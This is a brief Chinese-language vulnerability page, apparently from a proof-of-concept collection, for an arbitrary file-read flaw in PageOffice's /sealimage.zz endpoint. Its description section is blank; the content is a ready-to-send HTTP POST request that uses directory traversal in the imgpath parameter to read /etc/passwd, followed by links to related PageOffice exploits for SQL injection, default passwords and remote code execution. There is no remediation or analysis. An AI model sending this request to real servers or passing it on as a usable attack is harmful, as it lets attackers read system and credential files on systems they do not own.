PageOffice /sealimage.zz 文件读取漏洞

漏洞描述

PoC代码

POST /sealimage.zz?imgtype=*/*&imgpath=../../../../../../../../../etc/passwd HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0

相关漏洞推荐

• POC PageOffice /loginseal.zz 默认口令漏洞
• POC PageOffice poserver.zz SQL注入漏洞
• 卓正-PageOffice 远程代码执行漏洞
• PageOffice 存在任意文件下载漏洞
• POC PageOffice /poserver.zz 接口存在任意文件读取漏洞
• PageOffice 存在弱口令漏洞
• PageOffice imgpath 参数存在任意文件下载漏洞